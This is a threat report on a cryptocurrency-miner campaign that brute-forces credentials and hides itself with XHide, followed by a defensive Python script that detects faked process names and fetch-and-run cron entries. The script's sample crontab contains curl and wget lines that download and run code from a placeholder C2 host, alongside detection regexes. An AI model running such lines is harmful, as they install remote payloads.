A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the (defanged) URL hxxps://upajmeter[.]com/assets/.style/min hosted the command that downloads the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS).
The cryptocurrency miner is a multi-component threat made up of Perl and Bash scripts, miner binaries, the process hider XHide, and a scanner tool. It propagates by scanning for vulnerable machines and brute-forcing credentials, primarily default ones.
Analysis of the threat showed that the threat actor runs the component files several times a day, so the infected machine's status is reported to the command-and-control (C&C) server on a regular schedule. The shell script used in the infection can also download archive files that contain the scanner, the process hider, and the final payload.
The threat uses the process hider to conceal the miner binary, so a typical user is unlikely to notice the mining activity except through a drop in performance and suspicious network traffic. This is a familiar cover for threat actors whose playbook is to scan, brute force, and mine.
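Two host-side checks that follow from the two paragraphs above, written here as an added example rather than code from Trend Micro or from the malware: a process-name check that catches XHide-style faking by comparing the name a process displays (argv[0], which the launcher controls) against the binary the kernel records in /proc/<pid>/exe, and a crontab check for the scheduled fetch-and-run pattern that repeated downloads of the main script would leave behind. That the scheduling is cron-driven is an assumption; the page does not name the scheduler. The sample crontab and process records are constructed, and the c2.example.invalid URL is a placeholder.

```python
"""Added example: two host-side checks for the behaviour described above.

1. Process-name faking (XHide-style): ps/top print argv[0], which the
   launcher controls, but the kernel still records the real binary in
   /proc/<pid>/exe (with a " (deleted)" suffix if it was removed after start).
2. A scheduled fetch-and-run of a remote shell script, which is what a
   "download the main script several times a day" loop looks like if it is
   cron-driven (an assumption; the page does not name the scheduler).
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# argv[0] aliases that are legitimate: symlinked shells and multi-call binaries.
ALIASES = {"dash": {"sh"}, "bash": {"sh"}, "busybox": {"*"}}


@dataclass
class ProcInfo:
    pid: int
    argv0: str           # first NUL-separated field of /proc/<pid>/cmdline
    comm: str            # /proc/<pid>/comm, at most 15 characters
    exe: Optional[str]   # readlink(/proc/<pid>/exe), None if unreadable


def _displayed_name(argv0: str) -> str:
    """What ps shows, minus login-shell '-' and setproctitle ':' decorations."""
    tokens = argv0.split()
    return os.path.basename(tokens[0]).lstrip("-").rstrip(":") if tokens else ""


def name_mismatch(p: ProcInfo) -> Optional[str]:
    """Reason string if the visible name disagrees with the kernel's view, else None."""
    if not p.exe:
        return None                            # kernel thread or no permission
    if p.exe.endswith(" (deleted)"):
        return f"pid {p.pid}: binary removed from disk after start ({p.exe})"
    exe_base = os.path.basename(p.exe)
    shown = _displayed_name(p.argv0)
    allowed = ALIASES.get(exe_base, set())
    if "*" in allowed or shown in allowed:
        return None
    # Interpreters: argv0 'python3' vs exe 'python3.11' is a prefix, not a lie.
    if shown and shown != exe_base and not exe_base.startswith(shown):
        return f"pid {p.pid}: argv[0] {p.argv0!r} but exe is {p.exe!r}"
    # comm is the exec'd filename truncated to 15 chars unless prctl renamed it.
    if p.comm and not any(n.startswith(p.comm) for n in (shown, exe_base) if n):
        return f"pid {p.pid}: comm {p.comm!r} matches neither argv[0] nor exe"
    return None


def flag_processes(procs: List[ProcInfo]) -> List[str]:
    """Run name_mismatch over a list of records and keep the reasons."""
    return [r for r in (name_mismatch(p) for p in procs) if r]


def read_proc(pid: int) -> Optional[ProcInfo]:
    """Build a ProcInfo from a live /proc entry (Linux only)."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/cmdline", "rb") as f:
            argv0 = f.read().split(b"\0")[0].decode(errors="replace")
        with open(f"{base}/comm") as f:
            comm = f.read().strip()
    except OSError:
        return None
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None
    return ProcInfo(pid, argv0, comm, exe)


def scan_live_processes() -> List[str]:
    pids = [int(n) for n in os.listdir("/proc") if n.isdigit()]
    return flag_processes([p for p in map(read_proc, pids) if p])


# curl/wget output piped straight into a shell ...
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da)?sh\b")
# ... or dropped into a world-writable directory and then run.
FETCH_THEN_RUN = re.compile(
    r"\b(?:curl|wget)\b.*(?:/tmp|/var/tmp|/dev/shm)/\S+.*(?:&&|;)\s*(?:(?:ba|da)?sh\b|chmod\b|\./)"
)


def suspicious_cron_lines(crontab: str) -> List[str]:
    """Return non-comment crontab lines that fetch something and execute it."""
    hits = []
    for line in crontab.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and (PIPE_TO_SHELL.search(s) or FETCH_THEN_RUN.search(s)):
            hits.append(s)
    return hits


# Constructed sample data (not from the page); the URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://c2.example.invalid/assets/.style/min | sh
*/15 * * * * wget -q -O /dev/shm/.x http://c2.example.invalid/x.tgz && sh /dev/shm/.x
30 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
"""
SAMPLE_PROCS = [
    ProcInfo(2001, "-bash", "bash", "/usr/bin/bash"),                 # login shell, fine
    ProcInfo(2003, "sshd: alice@pts/0", "sshd", "/usr/sbin/sshd"),    # setproctitle, fine
    ProcInfo(4242, "/usr/sbin/httpd", "xmrig", "/tmp/.x/xmrig"),      # argv[0] faked
    ProcInfo(3003, "xmrig", "xmrig", "/tmp/xmrig (deleted)"),         # binary unlinked
]

if __name__ == "__main__":
    for reason in flag_processes(SAMPLE_PROCS) + suspicious_cron_lines(SAMPLE_CRONTAB):
        print("sample:", reason)
    if os.path.isdir("/proc"):
        for reason in scan_live_processes():
            print("live:", reason)
```

Both checks are heuristics: symlinked interpreters and multi-call binaries need allowlisting (the ALIASES table is the place), and on a real host the crontab check should also cover /etc/cron.d, per-user crontabs and systemd timers, since any of them can carry the same fetch-and-run line.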
We detected a threat that propagates by scanning for open ports and brute-forcing weak credentials, installing a Monero cryptocurrency miner and a Perl-based IRC backdoor as the final payload. The miner process is hidden using XHide Process Faker, a 17-year-old open source tool used to fake the name of a process.